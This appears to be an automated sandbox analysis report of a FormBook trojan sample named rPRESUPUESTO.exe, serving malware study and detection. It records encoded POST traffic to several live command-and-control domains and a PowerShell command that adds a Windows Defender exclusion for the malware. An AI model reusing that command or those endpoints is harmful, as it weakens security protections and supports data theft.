                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.europedriveguide.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.europedriveguide.com/2pcd/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=gKvW0owSgHRA53VnFFmssFoX19nuH2CDZFdQKuZhNJS7fJ4uhmEMyDGpUyiBOcDPwfrSFkv8el5JR2WFz3kCcMnwUGyzzAGGHly/+7448IVcK43nL4vxQsCPihv7KCzRRr/WyC47+eZFCn58bE+5D2JCcOjKRmomhhX7ygqJZAJyAMlkR24Z4VBR0JJTWz3BA5HbJOw85goqUGZ/zUi0vDVqOcop


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              43 | 192.168.2.5 | 49773 | 72.52.179.174 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:18:53.901906013 CEST | 1840 | OUT | POST /2pcd/ HTTP/1.1
                                              Host: www.europedriveguide.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.europedriveguide.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.europedriveguide.com/2pcd/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              44 | 192.168.2.5 | 49774 | 72.52.179.174 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:18:56.437958002 CEST | 535 | OUT | GET /2pcd/?4dV43tA=tIH23YAAyU0vk1VwVlLsnDkrzub9KGyrHgMKKMQURaOCIZhbg0Upzh73XSapbsD05fysGFvFeXdkAWPx22YjftjyG2q/7RKdCSWXn7wn/qpIWY7LWJ3oR8OZl3TaORuYDQ==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.europedriveguide.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:57.446877956 CEST | 520 | IN | HTTP/1.1 302 Moved Temporarily
                                              Date: Mon, 01 Jul 2024 14:18:56 GMT
                                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                              X-Powered-By: PHP/5.4.16
                                              Connection: close
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Location: http://ww7.europedriveguide.com/2pcd/?4dV43tA=tIH23YAAyU0vk1VwVlLsnDkrzub9KGyrHgMKKMQURaOCIZhbg0Upzh73XSapbsD05fysGFvFeXdkAWPx22YjftjyG2q/7RKdCSWXn7wn/qpIWY7LWJ3oR8OZl3TaORuYDQ==&3hkl=slNhbLXpBjO8vl&usid=16&utid=33620332093
                                              Content-Length: 0
                                              Content-Type: text/html; charset=UTF-8


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              45 | 192.168.2.5 | 49775 | 192.227.175.142 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:19:02.638027906 CEST | 776 | OUT | POST /irbt/ HTTP/1.1
                                              Host: www.coinmao.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.coinmao.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.coinmao.com/irbt/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=rohNZYUn/MeTYuxbmqJS4zGp2d6tuOB8lS1yDJdptNS9C46TfDrNszh7FYrQaZLOO63MdH3NTvm3gzCaOC211SoFD6lgqBITNEze+9whb5HdxGc0rpxDZqORJ36ZwZGIUxedwMmm2aHQ4bng3oyGztC9NezVQvSZNKb8UZLsxoNNJNQ1328Yrk5sAtwsOksR6R1JVGM=
                                              Jul 1, 2024 16:19:03.131706953 CEST | 399 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:19:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.coinmao.com/irbt/
                                              Strict-Transport-Security: max-age=31536000
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              46 | 192.168.2.5 | 49776 | 192.227.175.142 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:19:05.500678062 CEST | 796 | OUT | POST /irbt/ HTTP/1.1
                                              Host: www.coinmao.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.coinmao.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.coinmao.com/irbt/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=rohNZYUn/MeTYOhbg9lSojGq1d6t1+B4lS5yDMsy4p+9DayTOyrNtzh7O4rJZpKAO7L1dFzNTpK3gxKaP0+01Co9F6liuBITNEze+9kfb9Tdx1U0qIxEaqOSAX6ZhJGMUxf6wNKA2cDQ4ejg36aZ6tC/D+yaRO7PIb+sIZK0t4A4M79ftU0w4EVUQ+4bfUN4gyl5LRYBRDOM2JnBOZdS8oxEpqIr
                                              Jul 1, 2024 16:19:06.005846977 CEST | 399 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:19:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.coinmao.com/irbt/
                                              Strict-Transport-Security: max-age=31536000
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              47 | 192.168.2.5 | 49777 | 192.227.175.142 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:19:08.042437077 CEST | 1813 | OUT | POST /irbt/ HTTP/1.1
                                              Host: www.coinmao.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.coinmao.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.coinmao.com/irbt/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA= [TRUNCATED]
                                              Jul 1, 2024 16:19:08.534682035 CEST | 399 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:19:08 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.coinmao.com/irbt/
                                              Strict-Transport-Security: max-age=31536000
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                              Jul 1, 2024 16:19:08.881989956 CEST | 399 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:19:08 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.coinmao.com/irbt/
                                              Strict-Transport-Security: max-age=31536000
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              48 | 192.168.2.5 | 49778 | 192.227.175.142 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:19:10.587030888 CEST | 526 | OUT | GET /irbt/?3hkl=slNhbLXpBjO8vl&4dV43tA=mqJtasd7r+ucb4h/g/ZTmy6JwNbO/v5n7k97Wehkk725AqfiRwLRxT17AJTqC5rNKbn4S3nwUKyYsCTiBBHbxywoRNMYnVscP0z+oucLCcHVoXQNraVEZ5jUDUaptob6FA== HTTP/1.1
                                              Host: www.coinmao.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:19:11.085134029 CEST | 560 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:19:11 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.coinmao.com/irbt/?3hkl=slNhbLXpBjO8vl&4dV43tA=mqJtasd7r+ucb4h/g/ZTmy6JwNbO/v5n7k97Wehkk725AqfiRwLRxT17AJTqC5rNKbn4S3nwUKyYsCTiBBHbxywoRNMYnVscP0z+oucLCcHVoXQNraVEZ5jUDUaptob6FA==
                                              Strict-Transport-Security: max-age=31536000
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              49 | 192.168.2.5 | 49779 | 31.186.11.254 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:19:16.252042055 CEST | 806 | OUT | POST /s29p/ HTTP/1.1
                                              Host: www.genesiestudios.online
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.genesiestudios.online
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.genesiestudios.online/s29p/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=03HuNRyw1nNawuBXqX9UDawLI/nQYPcQWMsLDDiztcAXDpPORdfZRO8cRDLUvjW2n4ujW1fpLglobsyaFQZ/cy2pYubhNRpi6TuqZY0hiBg5A0y87nWlqw01cxeGFi36iR/A6MpTA7tQzB4nRd4vPVMA9KSGAn2wBRIe/EcVcUBM3jrq42meeo2PX4AOxRs2eoKn0yE=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              50 | 192.168.2.5 | 49780 | 31.186.11.254 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:19:18.868393898 CEST | 826 | OUT | POST /s29p/ HTTP/1.1
                                              Host: www.genesiestudios.online
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.genesiestudios.online
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.genesiestudios.online/s29p/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=03HuNRyw1nNaxPxXsEVUB6wIUvnQSvdZWMoLDBP2tuUXaMzOQf7Zcu8cZjLNiDX4n4qaW37pLghobuqaFjB4OS2rUObnJRpi6TuqZYgHiB45cVC86GWkrw00MheGPC2ziR+l6JJ1A5VQzAInSM4sc1MCyqTZNEO0LQQv/VdgHHBY2VGAiUu2NIa3HrI5ghNfELaXqlSVisuagosqQI6pA9HHf5uN


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                              51 | 192.168.2.5 | 49781 | 31.186.11.254 | 80
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:19:21.871066093 CEST | 1843 | OUT | POST /s29p/ HTTP/1.1
                                              Host: www.genesiestudios.online
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.genesiestudios.online
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.genesiestudios.online/s29p/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA= [TRUNCATED]


                                              Target ID:0
                                              Start time:10:15:11
                                              Start date:01/07/2024
                                              Path:C:\Users\user\Desktop\rPRESUPUESTO.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\rPRESUPUESTO.exe"
                                              Imagebase:0x4e0000
                                              File size:713'736 bytes
                                              MD5 hash:E78D43A26913CF101B98D1D04839EEE2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:10:15:15
                                              Start date:01/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe"
                                              Imagebase:0x700000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:10:15:15
                                              Start date:01/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:10:15:15
                                              Start date:01/07/2024
                                              Path:C:\Users\user\Desktop\rPRESUPUESTO.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\rPRESUPUESTO.exe"
                                              Imagebase:0xc40000
                                              File size:713'736 bytes
                                              MD5 hash:E78D43A26913CF101B98D1D04839EEE2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2329601584.00000000038F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2329601584.0000000002EF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:6
                                              Start time:10:15:18
                                              Start date:01/07/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff6ef0c0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:10:15:26
                                              Start date:01/07/2024
                                              Path:C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe"
                                              Imagebase:0x980000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4588318441.0000000004260000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:9
                                              Start time:10:15:27
                                              Start date:01/07/2024
                                              Path:C:\Windows\SysWOW64\ktmutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
                                              Imagebase:0x7b0000
                                              File size:15'360 bytes
                                              MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:10
                                              Start time:10:15:40
                                              Start date:01/07/2024
                                              Path:C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe"
                                              Imagebase:0x980000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:13
                                              Start time:10:15:52
                                              Start date:01/07/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff79f9e0000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:8.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:2.1%
                                                Total number of Nodes:238
                                                Total number of Limit Nodes:11

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 08a553d426504c96e7b692e449777d1806a168f7d22931ff89e99fb7d2db0f54
                                                • Instruction ID: fbe0c9227e3f02e48ff005b053d9096b6a016c09f2ebcb6abe54d23e7ad257e4
                                                • Opcode Fuzzy Hash: 08a553d426504c96e7b692e449777d1806a168f7d22931ff89e99fb7d2db0f54
                                                • Instruction Fuzzy Hash: D7716BB0E042198FCB14DFA9C5806AEFBF2FF89304F24816AD419AB255D734A941CFA0

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07879D6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 25a16075f0f2f982372484f05c46d9c48db56eb77efc077391c866c90d2a9777
                                                • Instruction ID: 8e9eb69daebcddfa4779fc59c2364dc4f56d73e48003336d35e3dfe939631363
                                                • Opcode Fuzzy Hash: 25a16075f0f2f982372484f05c46d9c48db56eb77efc077391c866c90d2a9777
                                                • Instruction Fuzzy Hash: 43B16BB1D0021A8FDF14CF68C841BEEBBF2AF98310F148169D80AE7250DB74A985CF91

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07879D6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 0344eeb3db8704612a0767bf32164401d19ae82efe49891cb65f7bacaf35e5ce
                                                • Instruction ID: 817f8c1979b330e3afda3aad7ad6eaebd26275b52335721e3175224145d9959c
                                                • Opcode Fuzzy Hash: 0344eeb3db8704612a0767bf32164401d19ae82efe49891cb65f7bacaf35e5ce
                                                • Instruction Fuzzy Hash: 19914AB1D0061A8FDF14CF68C841B9DBBF2AF98310F1481A9D81AE7290DB75A985CF91

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0110B39E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 13dc6dbad2cb8452cb10700b71d6719051ef450ccc259459e0fd97597cd748c7
                                                • Instruction ID: 2bf9eea2e71a87b5eeed8c19e2a73a3e6f89aa0fc45839d72afeba3030dc6cab
                                                • Opcode Fuzzy Hash: 13dc6dbad2cb8452cb10700b71d6719051ef450ccc259459e0fd97597cd748c7
                                                • Instruction Fuzzy Hash: 267145B4A00B058FDB69DF29D44479ABBF1FF88304F00892DD44AD7A80D7B4E945CB94

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 011059C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 6e2065973cd23196872e8b8adb553214da1528fdcabc9729f5a47dd3f5465819
                                                • Instruction ID: 4a725b19016ae2e4a477a01f17679513cb39cefd59f91e700ad1278728f28945
                                                • Opcode Fuzzy Hash: 6e2065973cd23196872e8b8adb553214da1528fdcabc9729f5a47dd3f5465819
                                                • Instruction Fuzzy Hash: 0641D4B1C0071DCBDB25CFA9C844B9EBBF6BF49304F24816AD508AB251DBB56945CF90

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 011059C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 6690f8b3cbbfb6bb32bd03f048c73a8d689b7d9649557ffd9df7b88d8ec903fd
                                                • Instruction ID: 669a3ba19967891413e136469f90f73411afefec06711bb2cc8eb12e36984d84
